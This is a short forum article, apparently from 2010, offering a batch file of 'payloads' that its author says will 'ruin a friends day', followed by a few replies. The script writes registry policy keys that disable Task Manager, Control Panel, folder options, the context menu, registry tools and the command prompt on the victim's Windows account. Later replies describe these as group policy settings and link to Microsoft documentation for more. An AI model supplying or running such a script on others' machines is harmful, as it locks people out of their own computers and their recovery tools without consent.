Batch Script Payloads

Cleptography's Avatar author of Batch Script Payloads
This is an article on Batch Script Payloads in Programming.
This annoying thing is nothing more than a simple list of payloads you could stick in a .bat file to ruin a friends day.

Batch Script Payloads
-------------------------
Code:
@echo off

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /f /v DisableTaskMgr /t REG_DWORD /d 00000001
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /f /v NoControlPanel /t REG_DWORD /d 00000001
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /f /v NoFolderOptions /t REG_DWORD /d 00000001
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /f /v NoViewContextMenu /t REG_DWORD /d 00000001
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /f /v DisableRegistryTools /t REG_DWORD /d 00000001
reg add HKCU\Software\Policies\Microsoft\Windows\System /f /v DisableCMD /t REG_DWORD /d 00000002
Go4Expert Founder
4Oct2010,10:22   #2
shabbir's Avatar
If you liked this article do nominate this article for Article of the month - Sep 2010 Before 15th of October 2010.
Go4Expert Member
5Nov2010,03:35   #3
tennsoccerdr's Avatar
So what is it going to do to them?
Go4Expert Member
13Mar2011,08:01   #4
Cleptography's Avatar
Quote:
Originally Posted by tennsoccerdr View Post
So what is it going to do to them?
To the novice user this will disallow them to use certain programs and apps on windows.
It's really nothing more than some group policy settings.
Here are a few more than you can add to the list.
You can get them here:
http://msdn.microsoft.com/en-us/library/ms815238.aspx